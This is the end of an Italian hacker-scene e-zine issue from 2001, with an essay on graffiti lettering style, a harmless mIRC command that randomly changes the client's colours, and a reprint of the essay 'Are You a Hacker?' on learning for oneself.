===================================WRITERS BLOCK (lo stile)====================================

(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)
Autore: Jrash^^
Crew : H@team
E-mail: jrash@hackersat.com
URL : www.hackersat.com
(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)*(*)

Salve ragazzi sono ancora io, Jrash , in questo articolo vorrei parlarvi di un argomento che
riguarda l HIP HOP .... è un argomento molto interessante leggetelo!! Mi riferisco
soprattutto a coloro che hanno voglia di imparare..
Cosa è lo stile??
Andiamo diretti al nocciolo...è la sostanza di cui sono fatti i trend....è qualcosa di
accattivante, qualcosa che ispira profondamente, qualcosa che una volta iniziato fara
parlare di sé e sara seguito dalla gente.... ora arriviamo proprio al culmine..la moda è un
luogo nel quale si rimane un istante.... lo stile è un luogo che si raggiunge dopo
aver ricevuto un calcio nel sedere e ci si rimane per sempre .
Lo stile rimane con te perche sei tu. La moda è nulla senza lo stile, perche lo stile
governa. Adesso parliamo della parte tecnica e smonteremo la faccenda come se fosse
una macchina. Rimanendo incollati al concetti di stile e di moda potremmo utilizzare
una bella ragazza per esempio, anche se verro accusato di masochismo.
Le frecce sono diventate un fondamento dello stile ..e vanno ancora di moda .
Eppure metterle sul vostro pezzo non bastera a farlo funzionare.
Coloro i quali riescono a riconoscere quando una cosa sembra ma non
è riescono ad individiuare i writer che fanno uso di colori pazzeschi
come anche quelle cose che spuntano dai loro pezzi dando l illusione di
complessita quando invece è lo schema dei colori a far sembrare le loro
lettere cosi.
Non si puo dire che non ci sia lo stile, ma se vogliamo parlare a un altro livello è quello
che io chiamo robba fasulla. Un mio compare ha detto di quei pezzi che le uniche cose in
wildstile erano la prima e l ultima lettera, mentre il restante era formato da
caratteri mediocri con un gusto decente ma senza densita.
Per prima cosa tenete a mente una cosa: frecce, ornamenti e sfondi non sono segno
di stile. squisite capacita tecniche e padronanza di tappini e bombolette non
pareggiano lo stile, ma una combinazione degli elementi qui sopra citati puo
rendere efficiente lo stile di ognuno . Prima di continuare mi piacerebbe dire che
tutto questo è stato valutato dopo aver acquisito esperienze e contatto con lo stile
e dopo aver fatto del lettering un mestiere ...infiniti sono i confini, ma all interno
dei confini dell infinito esistono fondamenti tecnici del tipo una linea retta non puo
venire curvata. Tutte queste cose derivano dall esperienza e dall occhio e che ognuno puo
raggiungere una volta che gliele si porta all attenzione .Non è automatico che tutti i terzi
occhi vedano la stessa cosa, ma alla fine la maggior parte comprendera la totalita della
scienza che governa uno stile all interno di questo infinito .
Possiamo odiare uno stile o amarlo ,ma questo non altera necessariamente la sua qualita.
Per potere essere un connoisseur, l improrogabile condizione di partenza deve essere
quella di conoscere la propria roba.
Non permettete che quelli che pronunciano la parola stile lo facciano senza cognizione di
causa Potrebbero essere dei falsi. Le decorazioni in origine facevano parte delle
firme e dei pezzi e potrebbero venire restituite alle firme con lo stile della
firma come pezzo...ma non come se fosse un idea o concetto definitivo che vada
controcorrente riguardo ai particolari che una volta venivano usati per i pezzi.
Prendete nota del fatto che all inizio non esiste vano schemi precisi. Alla fine degli anni
70 e nei primi anni 80 i writer cominciarono ad avere piu materiale al quale
riferirsi e quindi un idea migliore delle possibili direzioni da intraprendere .
Con i pezzi , le connessioni e le frecce si fusero e diedero inizio ad uno stile
che poi divenne una moda con il proprio stile . Era facile far intuire che questo concetto
avrebbe potuto essere portato avanti, quindi queste caratteristiche divennero multiple.
E adesso andremo indietro per scoprire come queste condizioni non determino necessariamente
la riuscita di un buon pezzo. Una cosa che noterete delle frecce e che tendono
sempre ad avere una posizione che possa conferire al pezzo un senso di movimento... possono
fluire dalla sinistra alla destra , ma se viene a mancare questo tipo di approccio ,
si dovrebbe comunque fare in modo di distribuirle equamente lungo il pezzo. Non sta scritto
da nessuna parte che debbano andare per forza da sinistra a destra ..ma è
proprio qui che lo stile subentra per completare la moda.
Le frecce non sono state inventate con lo scopo di avere una funzione precisa, esse
sono un concetto che inizio per il semplice motivo che era una cosa che si poteva fare .
E cosi è stato.
Una volta concepite le frecce , gli errori e gli esperimenti nella loro
realizzazione portarono a capire che il loro uso , cosi come il loro posizionamento ,
offre variazioni infinite. E concettuale!! In principio furono concepite ed
introdotte come frecce e punti... ed erano smussate, non appuntite.
Un famoso writer di new york fu veloce a far notare il fatto che: siccome non c è
nessuno la fuori che sta davvero facendo qualcosa, la roba fiacca viene considerata
grandiosa ! La mia convinzione è che se i writer portassero questa roba ad un altro livello ,
altri sarebbero in grado di distinguere lo squisito dal bell fatto. La bomba è stata
sparata ed esplode.Un milione di cerchi, intrecci e duemila frecce non stanno ad
indicare che ce l hai fatta. Puoi prendere due pezzi dello stesso writer e vedere
il perche uno funziona e l altro non ce la fatta...
Forse perche l aveva fatto troppo complicato rompendo l armonia e la continuita.
Forse lo schema dei colori non funzionava e rovinava tutto l insieme. forse uno
normale non riesce a scorgere questi particolari perche i suoi standard si basano
ancora sul "simile a " , "diverso dal" gente che non fa writing e che non sa nulla
di cio che i writer considerano "ThE mAgNiFiCiEnT"! Non importa quanto uno
sia bravo tecnicamente, lo stile è l unicita dello stile dipendono dall occhio dalla
capacita di comprendere le forme e dall immaginazione.
Si tratta di capire instintivamente come scorrere come dirigere il tratto , come
collegare le frecce , come unire le lettere , tubi e linee e di conseguenza è una
cosa che alcuni hanno , mentre altri decisamente no. Tecnicamente il pezzo è l unico
elemento chiarificante.
Ovviamente non si puo fare come i professori ed indicare tutte le imprecisioni
per cui un pezzo non funziona rispetto ad un altro, vatutto molto al di la degli standard.
Questo è un dato di fatto. E un po come cantare off beat. Uno va in off beat solo
perche siamo progammati a credere di sapere cosa significhi essere "on beat"? O è
semplicemente un istinto , quello che constringe ad andare in off beat?
Pensate che tutto questo sia discutibile? Cos è un pezzo in wildstyle che ha senso? Frecce
che fluiscono ogni dove contro le frecce che nonb riescono a muoversi .
Se prendete in considerazione la maggior parte dei pezzi , per i quali
garatisco io stesso che sono fatti senza uno studio preciso, troverete che questo
approccio è stato assimilato. Per esempio, come dicevo prima , le frecce partono
di solito da sinistra a destra .
Possono andare verso l alto , il basso e qualche altra direzione ,ma non possono
andarsene a spasso da qualunque parte.
Se fosse cosi tutti riuscirebbero ad essere stilosi...non si potrebbe parlare di pezzi,
perche non ci sarebbe nessuna base sulla quale discutere la qualita , la
competenza e la compattezza di una composizione.
Penso che questa conversazione potrebbe non avere mai fine. L esperienza dell occhio
della mente è la miglior insegnante . Gli ornamenti sono dei materiali che non vengono
utilizzati con le dovute conoscenze sul come lavorarli fuori al meglio...non ti faranno
mai risultare vincente.
In un regno in quale i ciechi possono essere d accordo con le nostre convinzioni,
lo stile...sebbene sia quello che tu lo fai essere...non è sempre farlo ,non senza
la corretta comprensione delle sue dinamiche. Persino uno stile nuovo ,in grado di
spezzare il legname con le origini, deve per forza possedere qualcosa che lo renda
figo, che gli metta le ali ed il suo possedere dovra avere l abilita di assorbire
questa realta...Opinione??
Chiamatelo come volete lo stile è cio che tu ne fai di esso e quello che fai parla
da solo..Immagginatevi se parlassimo seriamente... o se stessimo riempiendo queste
pagine solo per farvi impazzire, nel frattempo...mandateci un po di robba vostra e
smettetela di essere timidi . Senza cercare di avere l ultima parola in merito proveremo
a farvi notare cosa vi manca ...sempre che abbiate le palle di mettere la vostra roba
sulla linea del fuoco.......
Alla proxima!! Un saluto da parte di Jrash^^!!

Ringraziamenti:un saluto a tutti quelli dell H@team; un bacione a Morgana^^ e a Maryee!!
Un FUCK OFF a Giada, e a tutti quelli che mi odiano (dolcissimo=cazzone)!!

JRASH 26/01/2001

=====================jrash@hackersat.com===H@team=====================================[Jrash^^]°





ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø
ø EFFETTO CON IL MIRC! ø
ø NCKxxx ø
ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø



Ciao ragazzi sono Syn, scrivo questo mini art da parte di un mio amico.
Un giorno mi disse di provare un effetto con il conosciutissimo client "mIRC"...
Mi piaciuto talmente che ho deciso di pubblicarlo.
E' anche un motivo per ringraziarlo e mettere alla luce il suo impegno (sta per finire il suo
script!)

NCKxxx è vivo e vegeto, questo è riferito a molti che chiedono di questo membro!! :)

eccovi il codice:



/timer 0 0 /colour listbox $rand(1,15) | /colour background $rand(1,15) |
/colour editbox $rand(1,15) | /colour listbox text $rand(1,15) |
/colour editbox text $rand(1,15) | /colour normal text $rand(1,15) |
/colour own text $rand(1,15)


per termimarlo scrivete /timer 0 off

ciao




--------------------------=fInE numero "3" della rivista "DirtyNet"=---------------------------

DirtyNet3 è finita...andate in pace...











=RingaZiaMenti= :::::::::::


Tepippo
Screener_it
TankCommandos Crew
Avatar
Lo-Regio
Giada
Federica P.
Agnello
Totti
Carminuccio
Articolo31
Gollo
Scafuto
Scafuti Chip
Carmen Consoli
mR_bIsOn















Chicca:

Are You a Hacker?
by ReDragon

Take a little quiz for me today. Tell me if you fit this
description. You got your net account several months ago. You have been
surfing the net, and you laugh at those media reports of the information
superhighway. You have a red box, you don't have to pay for phone calls.
You have crackerjack, and you have run it on the password file at a unix
you got an account on. Everyone at your school is impressed by your computer
knowledge, you are the one the teachers ask for help. Does this sound
like you? You are not a hacker.
There are thousands of you out there. You buy 2600 and you
ask questions. You read phrack and you ask questions. You join
#hack and you ask questions. You ask all of these questions, and you
ask what is wrong with that? After all, to be a hacker is to question
things, is it not? But, you do not want knowledge. You want answers.
You do not want to learn how things work. You want answers. You do not
want to explore. All you want to know is the answer to your damn
questions. You are not a hacker.
Hacking is not about answers. Hacking is about the path you
take to find the answers. If you want help, don't ask for answers,
ask for a pointer to the path you need to take to find out those answers
for yourself. Because it is not the people with the answers that are
the hackers, it is the people that are travelling along the path.









ConClusIOne :::::::::::


L'uomo che sa, sa di non sapere. (Socrate)
Ognuno di noi vuole essere unico, in realtà lo siamo tutti. (sYn)

Il giudizio universale è alle porte...non apritelo, neanche se bussa tre volte!!! (sYn)



Chiunque voglia collaborare , puo' sempre inviare i propi art a "syn@hackersat.com";
è chiaro saranno valutati prima. CMQ siete tutti ben accetti.
__ __ ___ ___ ___
| \ | |__) | \ / |\ | |__ | ritornerà...
|__/ | | \ | | | \| |___ |

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT